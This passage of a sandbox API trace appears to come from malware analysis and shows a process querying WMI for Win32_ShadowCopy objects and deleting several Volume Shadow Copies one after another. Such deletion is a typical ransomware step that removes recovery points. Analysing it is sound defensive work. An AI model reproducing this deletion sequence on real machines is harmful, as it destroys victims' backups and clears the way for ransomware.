This=0x1d03c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x26f768 | out: ppEnum=0x26f768*=0x1d03d18) returned 0x0 [0174.987] free (_Block=0x37bfb0) [0174.987] CoSetProxyBlanket (pProxy=0x1d03d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0174.991] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0174.993] malloc (_Size=0x18) returned 0x37bfb0 [0174.994] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0174.994] free (_Block=0x37bfb0) [0174.994] malloc (_Size=0x800) returned 0x37d490 [0174.994] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0174.994] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="똰\x15") returned 0x67 [0174.994] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0174.995] malloc (_Size=0x68) returned 0x37dca0 [0174.995] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0174.995] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0174.995] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0174.995] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0174.996] free (_Block=0x37dca0) [0174.996] free (_Block=0x37d490) [0174.996] LocalFree (hMem=0x15b630) returned 0x0 [0174.996] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0179.005] IUnknown:Release (This=0x1d03d80) returned 0x0 [0179.005] malloc (_Size=0x800) returned 0x37d490 [0179.005] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0179.005] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0179.006] malloc (_Size=0x20) returned 0x37dca0 [0179.006] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0179.006] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0179.006] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0179.006] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0179.006] free (_Block=0x37dca0) [0179.006] free (_Block=0x37d490) [0179.006] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0179.007] malloc (_Size=0x18) returned 0x37bfb0 [0179.007] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15b578, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0179.007] free (_Block=0x37bfb0) [0179.007] malloc (_Size=0x800) returned 0x37d490 [0179.007] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0179.007] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="똰\x15") returned 0x67 [0179.007] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0179.007] malloc (_Size=0x68) returned 0x37dca0 [0179.008] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0179.008] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0179.008] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0179.008] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0179.008] free (_Block=0x37dca0) [0179.008] free (_Block=0x37d490) [0179.008] LocalFree (hMem=0x15b630) returned 0x0 [0179.008] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0185.057] IUnknown:Release (This=0x1d03d80) returned 0x0 [0185.057] malloc (_Size=0x800) returned 0x37d490 [0185.057] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0185.057] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0185.057] malloc (_Size=0x20) returned 0x37ee10 [0185.057] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37ee10, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0185.057] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0185.058] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0185.058] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0185.058] free (_Block=0x37ee10) [0185.058] free (_Block=0x37d490) [0185.058] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0185.060] malloc (_Size=0x18) returned 0x37bfb0 [0185.060] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.060] free (_Block=0x37bfb0) [0185.060] malloc (_Size=0x800) returned 0x37d490 [0185.060] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0185.060] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="똰\x15") returned 0x67 [0185.060] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0185.060] malloc (_Size=0x68) returned 0x37dca0 [0185.060] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0185.060] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0185.060] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0185.060] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0185.061] free (_Block=0x37dca0) [0185.061] free (_Block=0x37d490) [0185.061] LocalFree (hMem=0x15b630) returned 0x0 [0185.061] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0198.161] IUnknown:Release (This=0x1d03d80) returned 0x0 [0198.161] malloc (_Size=0x800) returned 0x37d490 [0198.161] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0198.161] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0198.161] malloc (_Size=0x20) returned 0x37dca0 [0198.161] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0198.161] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0198.161] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0198.161] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0198.162] free (_Block=0x37dca0) [0198.162] free (_Block=0x37d490) [0198.162] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0198.163] malloc (_Size=0x18) returned 0x37bfb0 [0198.163] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0198.163] free (_Block=0x37bfb0) [0198.163] malloc (_Size=0x800) returned 0x37d490 [0198.163] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0198.163] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="똰\x15") returned 0x67 [0198.163] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0198.163] malloc (_Size=0x68) returned 0x37dca0 [0198.164] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0198.164] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0198.164] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0198.370] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0198.370] free (_Block=0x37dca0) [0198.370] free (_Block=0x37d490) [0198.370] LocalFree (hMem=0x15b630) returned 0x0 [0198.370] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0199.949] IUnknown:Release (This=0x1d03d80) returned 0x0 [0199.949] malloc (_Size=0x800) returned 0x37d490 [0199.949] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0199.949] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0199.949] malloc (_Size=0x20) returned 0x37dca0 [0199.949] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0199.949] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0199.950] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0199.950] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0199.950] free (_Block=0x37dca0) [0199.950] free (_Block=0x37d490) [0199.950] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0200.268] malloc (_Size=0x18) returned 0x37bfb0 [0200.268] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0200.268] free (_Block=0x37bfb0) [0200.268] malloc (_Size=0x800) returned 0x37d490 [0200.268] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0200.268] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0200.268] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0200.268] malloc (_Size=0x68) returned 0x37dca0 [0200.268] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0200.268] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0200.268] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0200.268] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0200.269] free (_Block=0x37dca0) [0200.269] free (_Block=0x37d490) [0200.269] LocalFree (hMem=0x15b790) returned 0x0 [0200.269] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0202.090] IUnknown:Release (This=0x1d03d80) returned 0x0 [0202.090] malloc (_Size=0x800) returned 0x37f780 [0202.090] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37f780, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0202.091] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0202.091] malloc (_Size=0x20) returned 0x37ff90 [0202.091] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37ff90, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0202.091] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0202.091] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0202.091] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0202.091] free (_Block=0x37ff90) [0202.091] free (_Block=0x37f780) [0202.091] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0202.093] malloc (_Size=0x18) returned 0x37bfb0 [0202.093] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0202.093] free (_Block=0x37bfb0) [0202.093] malloc (_Size=0x800) returned 0x37ee10 [0202.093] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37ee10, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0202.093] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37ee10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0202.093] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0202.093] malloc (_Size=0x68) returned 0x37d9f0 [0202.093] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37d9f0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0202.093] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0202.093] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0202.093] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0202.093] free (_Block=0x37d9f0) [0202.093] free (_Block=0x37ee10) [0202.093] LocalFree (hMem=0x15b790) returned 0x0 [0202.093] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0206.757] IUnknown:Release (This=0x1d03d80) returned 0x0 [0206.757] malloc (_Size=0x800) returned 0x37ee10 [0206.757] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37ee10, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0206.757] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0206.757] malloc (_Size=0x20) returned 0x37fc40 [0206.757] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37fc40, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0206.757] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0206.757] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0206.757] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0206.758] free (_Block=0x37fc40) [0206.758] free (_Block=0x37ee10) [0206.758] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0206.760] malloc (_Size=0x18) returned 0x37bfb0 [0206.760] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0206.760] free (_Block=0x37bfb0) [0206.760] malloc (_Size=0x800) returned 0x37ee10 [0206.760] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37ee10, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0206.760] FormatMessageW (in: 